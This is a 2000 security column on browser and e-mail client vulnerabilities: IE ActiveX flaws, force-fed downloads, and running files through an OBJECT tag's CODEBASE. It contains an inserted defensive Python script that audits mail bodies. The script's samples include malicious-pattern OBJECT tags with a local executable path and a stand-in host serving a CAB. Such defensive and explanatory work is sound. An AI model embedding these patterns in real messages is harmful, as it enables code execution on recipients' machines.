Security Watch

SAN MATEO (07/17/2000) - Last week's column on the Life-Changes virus and Microsoft Corp. Windows scrap files got us thinking: Perhaps the quickest avenue to a mother lode of corporate data isn't through the front door. We've preached in this column more than a few times that Web (server) hacking is the bane of e-commerce, but recent events have made us take a serious look at the other end: Internet client software.

The growing number of vulnerabilities in client software creates a close runoff with the server side for the most damaging technique of 2000. If you consider that everyone from the CEO to the Web development team is using this software for nearly 90 percent of their daily activities (namely e-mail reading and Web browsing), it might begin to dawn on you that this is indeed a serious issue.

The sheer distributed nature of the problem also makes it much harder to patch than its counterpart on the server side. Worried yet?

Frankly, we're surprised that the most well-publicized client hacks (Melissa and its variants, Worm.Explore.Zip, "I Love You," etc.) have been so mild.

Looking at some of the tools and techniques posted on the Internet, it's amazing that we haven't read any stories of more serious damage.

Take, for instance, the site of the man Microsoft surely loves to hate, Georgi Guninski. Based solely on the research he's posted on the Web, Georgi is arguably one of the world's foremost experts on Web browser and e-mail client hacking.

The litany of vulnerabilities on Georgi's Internet Explorer page is astounding, ranging from Java to ActiveX problems, cross-frame security to help-file issues, and in severity from reading local files to the capability to execute arbitrary code. To be honest, we've seen advisories announcing many of these vulnerabilities in the past but used to pooh-pooh them as "end-user problems."

After testing most of Georgi's proof-of-concept code, we're now believers. If anyone still thinks exploit code isn't a powerful motivator for fixing things, they should visit Georgi's page. He just released two new exploits that access local ActiveX objects and are capable of writing files to disk. Microsoft was working on patches at the time of our writing this column, but had not yet released them.

Another citizen sure to be high on the Microsoft IE team's hit list is Juan Carlos García Cuartango. Juan Carlos' Web site is another great resource for client-side security information, if you happen to read Spanish.

There is an English version of the site's most recent addition, which concerns the Active Setup Download vulnerability. This is a nifty DoS (denial of service) attack that exploits an ActiveX control used for Active Setup to download signed Microsoft CAB files to any specified location on disk, even if that location overwrites another file. Microsoft has patched this one (Bulletin MS00-42).

There are plenty of other folks finding holes in the fabric of the client side of the Internet. The gang at one site (its name is short for malicious software) recently created a stir when they posted an advisory about "force-feeding" files to IE and Outlook users, even when they expressly cancel the download process. In our testing, there are many variables that affect this outcome, and exploiting it via a malicious e-mail message (as opposed to a malicious Web page) is not trivial. Nevertheless, this is the beginning of a serious problem if files can be randomly written to disk without user authorization. Microsoft has not yet responded to this one.

Hacker extraordinaire Weld Pond (of L0pht and netcat NT fame) chimed in on behalf of his colleague Dildog (of Cult of the Dead Cow and Back Orifice 2000 fame) on the Bugtraq thread addressing the force-feeding. Weld et alia provided a mechanism for executing files force-fed to users via the technique. By stuffing an ActiveX OBJECT tag with a nonzero CODEBASE parameter into the body of a malicious e-mail message, any file on disk can be executed.
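The mechanism described above, an OBJECT tag carrying a CODEBASE attribute inside an HTML e-mail body, is something a mail gateway or desktop filter can look for before the message ever reaches a client that might honour it. The following is an added example for this column, not code from the column's authors or from any of the researchers it cites. It parses constructed HTML bodies (the sample messages, the placeholder class id and the local path are all made up here), flags every `<object>` element, and rates a CODEBASE that points at a local drive, UNC path or `file:` URL as the most serious case, since that is the pattern the column says was used to launch an executable already on disk.

```python
"""Audit HTML e-mail bodies for <object> elements with a CODEBASE attribute.

Added example (defender-side check); sample messages are constructed here
and are not taken from the advisories the column refers to.
"""
from html.parser import HTMLParser
import re

# A CODEBASE that names a local drive, UNC share or file: URL is the
# worrying case: it can reference something already present on the disk.
LOCAL_CODEBASE = re.compile(r"^(file:|[a-zA-Z]:[\\/]|\\\\)", re.IGNORECASE)

# Ordering used when summarising a message by its worst finding.
SEVERITY_RANK = {"none": 0, "low": 1, "medium": 2, "high": 3}


class ObjectTagAuditor(HTMLParser):
    """Collects (severity, detail) tuples for every <object> tag seen."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases tag and attribute names.
        if tag != "object":
            return
        attributes = {name: (value or "") for name, value in attrs}
        codebase = attributes.get("codebase", "").strip()
        if codebase:
            severity = "high" if LOCAL_CODEBASE.match(codebase) else "medium"
            self.findings.append((severity, "codebase=" + codebase))
        elif "classid" in attributes:
            # An embedded control with no CODEBASE is still worth noting in mail.
            self.findings.append(("low", "classid=" + attributes["classid"]))


def audit_mail_body(html):
    """Return the list of (severity, detail) findings for one HTML body."""
    parser = ObjectTagAuditor()
    parser.feed(html)
    parser.close()
    return parser.findings


def triage(messages):
    """Map each message name to the worst severity found in its body."""
    result = {}
    for name, body in messages.items():
        worst = "none"
        for severity, _ in audit_mail_body(body):
            if SEVERITY_RANK[severity] > SEVERITY_RANK[worst]:
                worst = severity
        result[name] = worst
    return result


# Constructed sample bodies.  The class id is an obvious placeholder and the
# local path is invented; neither comes from a real advisory.
SAMPLE_MESSAGES = {
    "plain": "<html><body><p>Quarterly numbers attached.</p></body></html>",
    "local_codebase": (
        "<html><body>Hi!<OBJECT CLASSID=\"clsid:00000000-0000-0000-0000-000000000000\" "
        "CODEBASE=\"C:\\placeholder\\local_program.exe\"></OBJECT></body></html>"
    ),
    "remote_codebase": (
        "<html><body><object classid=\"clsid:00000000-0000-0000-0000-000000000000\" "
        "codebase=\"http://example.invalid/control.cab\"></object></body></html>"
    ),
    "classid_only": (
        "<html><body><object classid=\"clsid:00000000-0000-0000-0000-000000000000\">"
        "</object></body></html>"
    ),
}

if __name__ == "__main__":
    for name, worst in triage(SAMPLE_MESSAGES).items():
        print(f"{name:16s} -> {worst}")
        for severity, detail in audit_mail_body(SAMPLE_MESSAGES[name]):
            print(f"    [{severity}] {detail}")
```

The check is deliberately attribute-based rather than signature-based: it does not care which control is named, only that an e-mail body is trying to embed one and where it says the code lives. In a gateway you would quarantine or strip anything rated high and log the rest for review.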

Yikes. However, in our testing, we also found that several planets had to be in alignment for this to work. Primarily, on Outlook Express 5.00.2615.200, we had to set the security zone to Low, and we were still prompted with a dialog to execute an unsigned control when we tried to launch calc.exe in the system folder. Users would have to be pretty clueless to fall for this one, but it is another intriguing start, especially when taken together with the capability to write files to disk as supplied by

Let's not forget veterans such as Richard M. Smith and the Princeton Secure Internet Programming Team, who continue to make insightful forays into mobile code security. Even relative unknowns are pointing out holes: Andrew Nosenko posted an advisory on IE frame security issues (see Microsoft Security Bulletin MS00-033).

We could go on for four more columns on related client-side problems. Is your telescope starting to turn around, or are we just navel gazing? Let us know at

Stuart McClure is president and CTO and Joel Scambray is managing principal at security consultant Foundstone.
